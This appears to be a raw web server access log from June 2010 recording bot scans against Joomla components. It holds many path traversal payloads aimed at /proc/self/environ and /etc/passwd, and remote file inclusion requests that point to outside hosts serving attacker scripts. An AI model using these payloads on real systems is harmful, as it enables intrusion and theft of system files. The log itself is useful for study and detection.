94.23.6.211 - - [13/Jun/2010:02:45:54 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:45:58 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:45:59 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:45:59 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:45:59 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
208.43.133.147 - - [13/Jun/2010:02:46:00 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.819"
208.43.133.147 - - [13/Jun/2010:02:46:00 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.819"
208.43.133.147 - - [13/Jun/2010:02:46:00 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.819"
94.23.6.211 - - [13/Jun/2010:02:46:09 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:46:09 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
122.252.7.141 - - [13/Jun/2010:02:46:22 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:02:46:22 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
202.71.108.28 - - [13/Jun/2010:02:46:33 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.834"
202.71.108.28 - - [13/Jun/2010:02:46:35 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
94.136.63.119 - - [13/Jun/2010:02:47:09 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:02:47:09 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:02:47:09 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:02:47:41 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:02:47:41 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:02:47:41 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
207.46.204.181 - - [13/Jun/2010:02:48:36 -0500] "GET /logs/access_log.1211068800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.225.141.62 - - [13/Jun/2010:02:49:27 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
67.225.141.62 - - [13/Jun/2010:02:49:28 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.225.141.62 - - [13/Jun/2010:02:49:28 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
94.136.63.119 - - [13/Jun/2010:02:49:32 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:02:49:32 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:02:49:32 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
219.240.36.36 - - [13/Jun/2010:02:51:13 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
220.225.66.178 - - [13/Jun/2010:02:51:21 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
220.225.66.178 - - [13/Jun/2010:02:51:23 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
220.225.66.178 - - [13/Jun/2010:02:51:28 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.136.63.119 - - [13/Jun/2010:02:51:46 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:02:51:46 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:02:51:46 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:02:52:07 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
67.225.141.62 - - [13/Jun/2010:02:52:08 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.225.141.62 - - [13/Jun/2010:02:52:08 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
94.136.63.119 - - [13/Jun/2010:02:52:26 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
212.227.248.216 - - [13/Jun/2010:02:52:43 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.227.248.216 - - [13/Jun/2010:02:52:48 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.227.248.216 - - [13/Jun/2010:02:52:54 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
220.225.66.178 - - [13/Jun/2010:02:53:04 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
220.225.66.178 - - [13/Jun/2010:02:53:06 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
220.225.66.178 - - [13/Jun/2010:02:53:07 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
212.227.248.216 - - [13/Jun/2010:02:53:26 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
219.240.36.36 - - [13/Jun/2010:02:53:36 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
194.146.226.69 - - [13/Jun/2010:02:53:49 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
194.146.226.69 - - [13/Jun/2010:02:53:49 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
200.202.243.41 - - [13/Jun/2010:02:54:42 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.813"
200.202.243.41 - - [13/Jun/2010:02:54:44 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
200.202.243.41 - - [13/Jun/2010:02:54:44 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
194.146.226.69 - - [13/Jun/2010:02:54:46 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
94.23.6.211 - - [13/Jun/2010:02:55:26 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:55:26 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:55:26 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:55:26 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:55:26 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:55:26 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:55:26 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:55:26 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:55:26 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:55:26 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:55:26 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:55:26 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:55:27 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:55:27 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:02:55:52 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:02:55:52 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
122.252.7.141 - - [13/Jun/2010:02:56:10 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:02:56:10 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
194.146.226.69 - - [13/Jun/2010:02:56:55 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
194.146.226.69 - - [13/Jun/2010:02:56:55 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
194.146.226.69 - - [13/Jun/2010:02:56:55 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.121.227.168 - - [13/Jun/2010:02:57:37 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.227.168 - - [13/Jun/2010:02:57:38 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.227.168 - - [13/Jun/2010:02:57:45 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.227.168 - - [13/Jun/2010:02:57:45 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
219.240.36.36 - - [13/Jun/2010:02:57:58 -0500] "GET /logs/access_log.1274572800/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:02:57:59 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:02:57:59 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
194.146.226.69 - - [13/Jun/2010:02:58:00 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.142.68.199 - - [13/Jun/2010:02:58:54 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.68.199 - - [13/Jun/2010:02:58:55 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
212.227.248.216 - - [13/Jun/2010:03:00:12 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
212.227.248.216 - - [13/Jun/2010:03:00:17 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
78.46.70.228 - - [13/Jun/2010:03:02:31 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""Mozilla/5.0"
78.46.70.228 - - [13/Jun/2010:03:02:31 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""Mozilla/5.0"
78.46.70.228 - - [13/Jun/2010:03:02:31 -0500] "GET /logs/access_log.1272412800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.46.70.228 - - [13/Jun/2010:03:02:31 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.46.70.228 - - [13/Jun/2010:03:02:31 -0500] "GET /logs/access_log.1272412800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.46.70.228 - - [13/Jun/2010:03:02:31 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.46.70.228 - - [13/Jun/2010:03:02:31 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-"""
78.46.70.228 - - [13/Jun/2010:03:02:31 -0500] "GET /logs/access_log.1272412800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-"""
78.46.70.228 - - [13/Jun/2010:03:02:31 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-"""
78.46.70.228 - - [13/Jun/2010:03:02:32 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
78.46.70.228 - - [13/Jun/2010:03:02:32 -0500] "GET /logs/access_log.1272412800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-"""
78.46.70.228 - - [13/Jun/2010:03:02:32 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-"""
207.46.195.227 - - [13/Jun/2010:03:03:06 -0500] "GET /logs/access_log.1239926400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.98.134.54 - - [13/Jun/2010:03:03:13 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.98.134.54 - - [13/Jun/2010:03:03:13 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.98.134.54 - - [13/Jun/2010:03:03:13 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.98.134.54 - - [13/Jun/2010:03:03:17 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.98.134.54 - - [13/Jun/2010:03:03:17 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.98.134.54 - - [13/Jun/2010:03:03:17 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.98.134.54 - - [13/Jun/2010:03:03:17 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.98.134.54 - - [13/Jun/2010:03:03:17 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.98.134.54 - - [13/Jun/2010:03:03:17 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_rd_download&view=download&cid=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.98.134.54 - - [13/Jun/2010:03:03:26 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.98.134.54 - - [13/Jun/2010:03:03:26 -0500] "GET /logs/access_log.1271808000/index.php?option=com_rd_download&view=download&cid=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.98.134.54 - - [13/Jun/2010:03:03:26 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.120.4.230 - - [13/Jun/2010:03:03:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)"
62.120.4.230 - - [13/Jun/2010:03:03:35 -0500] "GET /logs/access_log.1271635200 HTTP/1.1" 200 643612 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Avant Browser)"
74.124.198.60 - - [13/Jun/2010:03:04:08 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:03:04:08 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:03:04:08 -0500] "GET /logs/access_log.1274832000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
94.136.63.119 - - [13/Jun/2010:03:05:14 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:03:05:16 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
207.46.195.229 - - [13/Jun/2010:03:05:36 -0500] "GET /logs/access_log.1162771200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.124.198.60 - - [13/Jun/2010:03:06:58 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:03:06:58 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:03:06:58 -0500] "GET /logs/access_log.1273363200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
189.108.172.26 - - [13/Jun/2010:03:07:11 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:03:07:23 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
220.225.66.178 - - [13/Jun/2010:03:07:27 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.225.66.178 - - [13/Jun/2010:03:07:29 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.124.198.60 - - [13/Jun/2010:03:08:02 -0500] "GET /logs/access_log.1274832000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
94.136.63.119 - - [13/Jun/2010:03:10:48 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:03:10:49 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:03:10:49 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:03:10:49 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:03:10:49 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:03:10:49 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
174.142.68.199 - - [13/Jun/2010:03:11:32 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.68.199 - - [13/Jun/2010:03:11:33 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.68.199 - - [13/Jun/2010:03:11:33 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
